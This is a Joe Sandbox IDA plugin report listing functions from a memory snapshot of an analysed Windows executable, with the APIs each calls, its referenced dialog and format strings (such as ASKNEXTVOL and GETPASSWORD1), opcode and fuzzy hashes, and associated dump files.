Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: cfe737045f1f92accc8c96d2028762a92c509349e6a140a65514463940fcc61e
Instruction ID: 373d8fbff7bbf18ad30a4aac21efdcaa64523b41c512d4d749f8d82b77afc543
Opcode Fuzzy Hash: cfe737045f1f92accc8c96d2028762a92c509349e6a140a65514463940fcc61e
Instruction Fuzzy Hash: E6318071A48248AEDB20FB689C41BFEBBE9EF15754F008095F469A7152DBB08A44C7A1

Function 00B8A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

EndDialog.USER32(?,00000001), ref: 00B8A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B8A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B8A4E2

Strings

ASKNEXTVOL, xrefs: 00B8A448

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: edbb87929770db69f959cc2f6978649bb778cafcf8ea8aa8dfd62cc0fbe22ba7
Instruction ID: 07986faf31f396f8d5f4f471b05092c5dcf0c445b89b85181392a2abcea8e8b0
Opcode Fuzzy Hash: edbb87929770db69f959cc2f6978649bb778cafcf8ea8aa8dfd62cc0fbe22ba7
Instruction Fuzzy Hash: EA11E932255200BFEE21AF68DC4DF6A77E9EB46300F184083F205972B0DBA15911D732

Function 00B7D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00B7D22E
_strncpy.LIBCMT ref: 00B7D278

Strings

$%s, xrefs: 00B7D223
@%s, xrefs: 00B7D218

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: bd8897ba7864123bcc51eba4232fd132e937455983b89d1a38d73d77c3e6997d
Instruction ID: 88d42c594728197a6f730a795ab6900773176eb6f44abe1782f883cf3ded9027
Opcode Fuzzy Hash: bd8897ba7864123bcc51eba4232fd132e937455983b89d1a38d73d77c3e6997d
Instruction Fuzzy Hash: EF21C632440208AEDF20DEA4CC46FEE7BF8EF05740F0485A1FE2996162D771DA45DB51

Function 00B8A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

EndDialog.USER32(?,00000001), ref: 00B8A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B8A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00B8AA24

Strings

GETPASSWORD1, xrefs: 00B8A9A9

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 64225c07afa445bb98a53f6357b58fc9abf424830c30acb3d2c3acc1bad9ca6c
Instruction ID: 74b2f336cf166ad5faa179429cd97c43d49678350e32fbd8ef5a8a596ab11243
Opcode Fuzzy Hash: 64225c07afa445bb98a53f6357b58fc9abf424830c30acb3d2c3acc1bad9ca6c
Instruction Fuzzy Hash: AE1148339441197AEB21AA649D49FFA7BECEB49300F0000E3FA49B34A0D6B19951D772

Function 00B7B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B7B51E

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

_wcschr.LIBVCRUNTIME ref: 00B7B53C
_wcschr.LIBVCRUNTIME ref: 00B7B54C

Strings

%c:\, xrefs: 00B7B514

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 21ab0a0ff7f983f5b0fe19da4fb4c9ef35df6b8ee372dd4753539791b91a1027
Instruction ID: 1b5547e7f2462dffa09b8fc29950c63785ebaab4244a2ec40ed58dadf5962aa8
Opcode Fuzzy Hash: 21ab0a0ff7f983f5b0fe19da4fb4c9ef35df6b8ee372dd4753539791b91a1027
Instruction Fuzzy Hash: CD01F953904311BACB20AB759C86E6BB7ECEEB57607518496F859C6081FB30D950C7A1

Function 00B806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B7ABC5,00000008,?,00000000,?,00B7CB88,?,00000000), ref: 00B806F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B7ABC5,00000008,?,00000000,?,00B7CB88,?,00000000), ref: 00B806FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B7ABC5,00000008,?,00000000,?,00B7CB88,?,00000000), ref: 00B8070D

Strings

Thread pool initialization failed., xrefs: 00B80725

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 84587e57b6b87cefbbfbb642ced5303a0e6a8ba2a5f1785c008ee8f2af5105de
Instruction ID: 307d863fd24c9f8c47209bb86557d836aae7aa44b0f9e5f9c1569c120e141b77
Opcode Fuzzy Hash: 84587e57b6b87cefbbfbb642ced5303a0e6a8ba2a5f1785c008ee8f2af5105de
Instruction Fuzzy Hash: 5111C6B1500709AFC3316F65CC84AA7FBECEB95744F10486EF1DA83210DAB16980CB60

Function 00B8D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00B8D3DE
REPLACEFILEDLG, xrefs: 00B8D3C9, 00B8D3FD

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: a104437066b132777154f80fd703b508dad1a1193c4a5950586f9e01cd476b68
Instruction ID: 9b0d11b8878658f2e73c4ae95fc801291363dded8e62e6d8a8dc5811c7173831
Opcode Fuzzy Hash: a104437066b132777154f80fd703b508dad1a1193c4a5950586f9e01cd476b68
Instruction Fuzzy Hash: 4D017175A04245AFCB11AF18ED44E9A7BE9E719380B0445A2F509D3370DEB1D850EBA1

Function 00B991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B99269
__alldvrm.LIBCMT ref: 00B9946A
__alldvrm.LIBCMT ref: 00B9948C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: dd81b912dd1edf4d8b6a620862e1061d7bc5cbbe79074bfccca1888b499b1396
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: 76A134719042869FEF22CF6CC8917AEBBE5EF56310F1841FDE4959B381C2349942C754

Function 00B7A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00B780B7,?,?,?), ref: 00B7A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00B780B7,?,?), ref: 00B7A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00B780B7,?,?,?,?,?,?,?,?), ref: 00B7A416
CloseHandle.KERNEL32(?,?,00000000,?,00B780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7A41D

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 2f310213202aea509808a87c8388d33ceb1e7513a71d2e9bff63eda0a2fd63c6
Instruction ID: e9d57a16394bddf5e409d419cb6f3ef54fb9cd62941b85a39105d0ffcb251823
Opcode Fuzzy Hash: 2f310213202aea509808a87c8388d33ceb1e7513a71d2e9bff63eda0a2fd63c6
Instruction Fuzzy Hash: F541D030248380AAD731EF24CC46BAFBBE8ABC1700F04899DB5E8931D1D6649A48DB13

Function 00B9C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B989AD,?,00000000,?,00000001,?,?,00000001,00B989AD,?), ref: 00B9C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B9C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B967E2,?), ref: 00B9C181
__freea.LIBCMT ref: 00B9C18A

Part of subcall function 00B98518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B9C13D,00000000,?,00B967E2,?,00000008,?,00B989AD,?,?,?), ref: 00B9854A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 74e0daad4ee90eb2476f287932c699ab92b65f9e60e9adc2c675049e01e09a44
Instruction ID: 113400e5820dc086e3448215fc9bf65ad59dd8db7917da6a59f100c7e0699a83
Opcode Fuzzy Hash: 74e0daad4ee90eb2476f287932c699ab92b65f9e60e9adc2c675049e01e09a44
Instruction Fuzzy Hash: C831ED72A0021AABDF248F64CC82EAE7BE5EB41710F0401B9FC04E7251EB35CD50CBA4

Function 00B92503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00B9251A

Part of subcall function 00B92B52: ___AdjustPointer.LIBCMT ref: 00B92B9C

_UnwindNestedFrames.LIBCMT ref: 00B92531
___FrameUnwindToState.LIBVCRUNTIME ref: 00B92543
CallCatchBlock.LIBVCRUNTIME ref: 00B92567

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 0894cb0e1b915e13e42582019b01833907752649b3a9b8699341e15f8e5e8752
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: AB011732800109BBCF12AF55DC41EDA3BFAEF58710F0580A4F91866120C336E961EBA1

Function 00B89DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B89DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B89DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B89DDB
ReleaseDC.USER32(00000000,00000000), ref: 00B89DE9

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f76dec4900b0bbd2a13ee704890e6005f66a33d5a8d2401dbb4ecf4cc92003b4
Instruction ID: c45efe606bc0277b98e4b1a1f23187b4a9917f55e6463829c3b21e703d2a0e81
Opcode Fuzzy Hash: f76dec4900b0bbd2a13ee704890e6005f66a33d5a8d2401dbb4ecf4cc92003b4
Instruction Fuzzy Hash: 9EE0EC31987A61A7D7201BA4AC1DB9B7F58AB19712F054116F6059B2A4EEB04405CB94

Function 00B92016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00B92016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00B9201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00B92020

Part of subcall function 00B9310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00B9311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00B92035

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 364e8d494ad604c5993009e121094ffbfbe0aa902706c0fbbb7058b4a3f91cb2
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 60C04824808660F51C623BB262432BD0BC04C63FC4B9260F2E88027213EE060A1AE03B

Function 00B89F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00B89DF1: GetDC.USER32(00000000), ref: 00B89DF5
Part of subcall function 00B89DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B89E00
Part of subcall function 00B89DF1: ReleaseDC.USER32(00000000,00000000), ref: 00B89E0B

GetObjectW.GDI32(?,00000018,?), ref: 00B89F8D

Part of subcall function 00B8A1E5: GetDC.USER32(00000000), ref: 00B8A1EE
Part of subcall function 00B8A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00B8A21D
Part of subcall function 00B8A1E5: ReleaseDC.USER32(00000000,?), ref: 00B8A2B5

Strings

(, xrefs: 00B8A0A3

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 9b45e56821aeabbaf1ea5dd8289aced4be5f1e2a0cb9c803dc383daa3ab10818
Instruction ID: f4eab21befa2b66679bc357fcbb47ef7346d454b990ff8e7ed96c77c26e39b40
Opcode Fuzzy Hash: 9b45e56821aeabbaf1ea5dd8289aced4be5f1e2a0cb9c803dc383daa3ab10818
Instruction Fuzzy Hash: 65811471208354AFD714EF68D844A6ABBE9FF89704F00895EF98AD7260DB31AD05CB52

Function 00B80E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B80FF1

Strings

%ls, xrefs: 00B80E76, 00B80E8C
%s: %s, xrefs: 00B81000

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 7787e61a5317af1a5fb7b1442b23e6595b119538b6381e8d745c0b6a62f263b1
Instruction ID: 01958913bc93598abe8e29816c123df80e96b9d70173e200946bae55ba9cc506
Opcode Fuzzy Hash: 7787e61a5317af1a5fb7b1442b23e6595b119538b6381e8d745c0b6a62f263b1
Instruction Fuzzy Hash: 7C51B33159C700F9FA703AA4CC92F3776E9EB14B81F208DD6B39A644F1C6925454F712

Function 00B7772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B77730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B778CC

Part of subcall function 00B7A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B7A27A,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A458
Part of subcall function 00B7A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B7A27A,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A489

Strings

:, xrefs: 00B777A1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 04cb15e1c49056042df19f2eadce64c408edb66df9e51473f9d699705b97878b
Instruction ID: 6c004e8e40406f95fc0f414c60053992e7783210f1460ccc5506cae3c45caf66
Opcode Fuzzy Hash: 04cb15e1c49056042df19f2eadce64c408edb66df9e51473f9d699705b97878b
Instruction Fuzzy Hash: 98415071844258AADB25EB50CD55EEEB3FCEF45300F0081DAB62DA2192EB745F84DB61

Function 00B7B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 00B7B708
\\?\, xrefs: 00B7B6BE, 00B7B6FA, 00B7B75B, 00B7B7AE

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
